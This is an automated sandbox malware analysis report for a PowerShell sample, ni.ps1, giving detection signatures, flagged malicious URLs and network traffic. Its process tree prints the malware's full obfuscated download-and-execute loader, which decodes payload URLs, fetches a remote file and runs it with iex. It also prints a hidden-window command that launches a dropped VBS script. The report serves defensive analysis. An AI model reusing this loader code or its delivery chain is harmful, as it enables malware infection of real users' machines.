Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ni.ps1

Overview

General Information

Sample name:ni.ps1
Analysis ID:1568993
MD5:bbaa2ede1a42e0a17b6a1b1ebc59eb07
SHA1:eff8193f408c8f81eacbee310582b31ca4d9f014
SHA256:077934deadb778ea2b87fad0bd565dd9bfb85c4c30604aaa5be014d305964466
Tags:Listofrequireditemsps1user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 5504 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 2956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. CollsDabbnp uperl ,onriAdmistReas,(Gyroc$SubpoSTimaly ouchnA tindAadalsUnextbSvidueIldstk .rcae.hicqnDressdSla,ge Re.llDriftsLyskoeDaadynVur es U or)Bugg ');responsibly (Psykopaterne 'Discr[NondeN,ungeeAletht .nds.DeleaSBal,ueArketrShehivIrideiAliptcSynodeOverfPHandeoIlyusi BurenBj,intHnekyMNonsua isagn Cycaa utohgBartoeReendrf eda]Obser:Blurr:NulpuSMegaleSubclcCalorubronzr.hanti.eniltF,iery eavP LiftrUndeeoDragetRenteoTwi,ocTvenloProfelSejer P,str= ttr S.mme[ RegrNBuldeeCompatVener.Sukk,STh aseBealtcMar euepir,r VsbeisindetRumleyUnmirP IronrNo,deoA,hngtTrskeoDistac Udrro,adaylFir,cTfl.etyUnderpHearteMalaw]Dtres:,ifto: lkicTGa,ralNu,mesMudfl1Pante2Mainl ');$Orloven=$Crackajack[0];$Immuniseringer= (Psykopaterne 'forpl$ agakg VanvlSuspeo,nindbUnsecaInjurl Slav:Lsl dS Miliq Formu Va.ea Ch.il Drjhl PosteSnerprSolta=PlayrNBehole Re,iwKrag,-FlaggO rotbPulvejtabiaeBe,eacSkakstUds i Ye.rbSKininyMyatrsOb,eqt Bl,keCaesam epr.DeparN ,rojepredotSnedk.RetsaW KajaeNapkibOutsiCChl,rlSuba.i selveWatapn yelt');$Immuniseringer+=$Boere[1];responsibly ($Immuniseringer);responsibly (Psykopaterne ' Ren,$BrndsSEft,rqSkambuLil,ia RamtlAfterlDelage LeverModul. BergH Ken,eInspea VenddMdeafeUb,harAmarysScab,[Eremi$ BellHSpeciiEnedir ankf]Guldm= Stvk$prefiSUnletkmolluoSkrfnv TelttArcharTipsfeWhuzkr MagnnUdetje FikssS eka ');$Syndromic=Psykopaterne 'Twini$UvisnSSeitfqhyggeuPara,aKoo dlB,lsal,alose harmrHvsse.Un,waDLeonao ge fw DiabnMaconlBagtaoKompraTiltbd .limFdidasiRiposlVsenseMyr a(Menne$ OrieOOverfrDiskulSkjoroTimidvTaalteUdru nImpas, Spir$ScyppGRe,rieDishon fodheGookscPiluloR,ncilDruseo,ulemg VideiGstgicMiskra StanlPrlimlShellyFi,tr1 utcr4Attri9Prear) Mone ';$Genecologically149=$Boere[0];responsibly (Psykopaterne 'Eperv$De oyg Metal forho UtydbSlariaRaahulEngra: And.P PipirRadixeFien,pNonoprTowl.o FrisvFinanoBetynkBuntiePermidche s=.kken(AnthrTRe toe JurisCochltIndda-NonbuPSuperaOn.idtRockrhEpi l Ke s$aandeGK,rtoe.ominncolibeSupercAnd.tojobmulKonseoWorsegAntroi trancSaddlaSkvallDy.phlBankrySolid1 Ung.4Stenk9 Kard)Sonn. ');while (!$Preprovoked) {responsibly (Psykopaterne 'Cel,b$Race gG.rerl Tolbo PeribCroo.aToc al raft: .ifeCPeache WiglnInopetLig,rrStanciTupmasBeribt UdstiMetacsSammekAdmiseDemiw= S,li$Endevt,hasirFrugtuFormeeThund ') ;responsibly $Syndromic;responsibly (Psykopaterne 'AuktiS UrsitRestaa,osperSyntht F er-FilmiSKamsmlborgee Zar,e overpSkimm Rec o4Lings ');responsibly (Psykopaterne 'Onrus$ ,ejrgMimidlFaldeoBenytbB.ndaaCongrl ,rim:SolomPBagderPrio.eVrkmepwi nerRepugo.utinvAperioG.melkDys.ce Gal,d Iber=Bukni(appelTFormkeSpandsTortutAabni-fructP wasaa GonatTrysah Nord Regal$ istGE.gareEnchonCan,geTronsc FrdioDrg.ilskattoMat,hgOpdrtiDisalcAktivaParkelUdsm lModsty Pre 1Backw4Under9 Na,i) Konv ') ;responsibly (Psykopaterne ' Bee.$ yperg,iplal emato As,ebH,steaHepatlM.red:MandsLB,saaiT,ackn PredjNon.aeElselts,atteO,gragK llen Gli iG sponM rosgBesposLsegr=Afhng$Ga,leg MelllFrithoWosombTillia tayslWhi p: RadiIUdviknDryptgvis,rrBe vaipantnd Subr1Glot,3Skrun0Cultu+Udtry+ B,pi%Edvi.$Kur bCUnsparF.stlaForsac LsepkFinanaAfsvajIodocaTemp,cTaksok Phyl.MiliecUdm.to InfouRuttinTusint Arge ') ;$Orloven=$Crackajack[$Linjetegnings];}$Araliaceae=290259;$Miljkvalitetsplanlgningers=29639;responsibly (Psykopaterne 'Natio$Omdb gSoleslapp ioGourmbAnimaa TrivlLsefa:AlterPKlknioErstasSlumbtCountoDomflf.ommafUnderiAlterc I dbeKonto1Udfyl6Etymo9 Micr Cont=Skuff LametGG,dmueReligt ,mor-GrftnCPhotooCollinTeo,otPigmee.unjanGreyltD,bit D.ops$ .verGAtticeFri,enMotoremuskecL,jemoRegnil Tango S,argNorthiLselacAirifaUngdolSejerlJudi yurb,n1Acros4Pha.o9Overd ');responsibly (Psykopaterne 'silen$B,vgegProsolRiddeoBr,llbyokepa.algrlUndis:UnnapUWahidrShipreKombitOverghvalidrBrudsoMilitsaconit AbhoaR,prix,nteri D.tos Indf Baand=Unecs Yelli[StrenS.snoby Tomms duest enneeGoka.m Synk.GrinnCEdmunoU.dernLotu.vHygroeParejrUnchatNucle]Softe:Ordfr:CorpoFAttrarTota,ofr.dem esigB oncoaLandssSkalpePaa t6Upa.t4.olypSnonblt Lo,irJapaniDenunnStategAbacn(lockh$LauraPByrdeoCap is f akt P,aloOve.bfshogufhyp piFolkecSpendeTusay1Winte6Udsta9M,nha),teno ');responsibly (Psykopaterne 'Diffe$D kregBagerlVitrio Tungb ProsaU sanlInds,: GunsPEj.ndealfierNatalsMym.reUltracFormeuUn.artPrenaeo,onodV,ren Bleac=Mi be Procu[ sin SRooftyGhostsCamsht S.epeilbudmFulme..nplaT C,anePeracxIndvetSoedm. ictaENonsyn W,ldc aissoRequadkidnai Agr,nFevergOmpro] sept:Indst:linjeASt liSMedieCEjendIA.klaI Jitt.BibraGSli keRykketNota SDismatA mbrr ,proiPigt.nimporgQuarr(Droge$ TilrUVermir AnsgeMyelotBre.th,unstrmontao Grins U,retForesaAntinxPoteniG anasGenbr)Welle ');responsibly (Psykopaterne ' Aest$KumpagregenlUroceoBrisabPinliaSlettl Scar:.krudK eneto ForansikkevOp ageIllegn ReintStrop=P.nce$SaproPAfspae Bewrr.tomssBrutteEftercStranuperistPrecie,patldDyrke.Beskys uchfu ikrbgenersJovict Unl rpaal,iForlon relsgNr,ed( Anti$ansaeA.vmmer ,dveaCa.ill loseiAnaesaSleepcFaiteeSyncoa Pecheerran,A,std$ChansMAffrii BratlMa,hejAflbskHorotvToleraS temlTokr.istrobtBriefestr ttUdstysOrchepBam ul U deaInkvin Shu lC.nchg Cab.nStegeiTudesnDros gI.hereDe ucrNo.spsParac) Abol ');responsibly $Konvent;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7064 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ahorntr.Pib && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7164JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 2956JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7164.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_2956.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\z1rpb4.vbs'", ProcessId: 4768, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
          Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7164, TargetFilename: C:\Users\Public\eji.vbs
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ProcessId: 7164, ProcessName: powershell.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7164, TargetFilename: C:\Users\Public\eji.vbs
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\eji.vbs" , ProcessId: 5504, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ni.ps1", ProcessId: 7164, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T10:38:35.861453+010028033053Unknown Traffic192.168.2.549745148.251.114.233443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: ni.ps1Avira: detected
          Antivirus detection for URL or domain
          Source: https://www.erp-royal-crown.info/wh/SarAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Sarothrum.jAvira URL Cloud: Label: phishing
          Source: https://www.pineappletech.ae/ov/wh.vbsAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Sarothrum.Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SarothrAvira URL Cloud: Label: phishing
          Source: http://erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: http://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SarothruAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Sarothrum.jpAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Sarothrum.jpbAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SarotAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SaAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SaroAvira URL Cloud: Label: phishing
          Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdfAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SarothrumAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/whAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SarothAvira URL Cloud: Label: phishing
          Multi AV Scanner detection for submitted file
          Source: ni.ps1ReversingLabs: Detection: 28%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.5:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.5:49765 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb'J source: powershell.exe, 00000003.00000002.2189957906.000001DAB563D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2220195093.000001DACF904000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 6?m.pdbpdbtem.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2412345329.0000023976E45000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.pdbe source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbn source: powershell.exe, 00000000.00000002.2414714485.0000023977170000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2414714485.000002397712C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3496836394.00000263D8BFC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb" source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdbk source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X source: powershell.exe, 00000003.00000002.2219771232.000001DACF8A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\System.pdbc source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3496836394.00000263D8C5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D8A59000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ov/wh.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.info
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
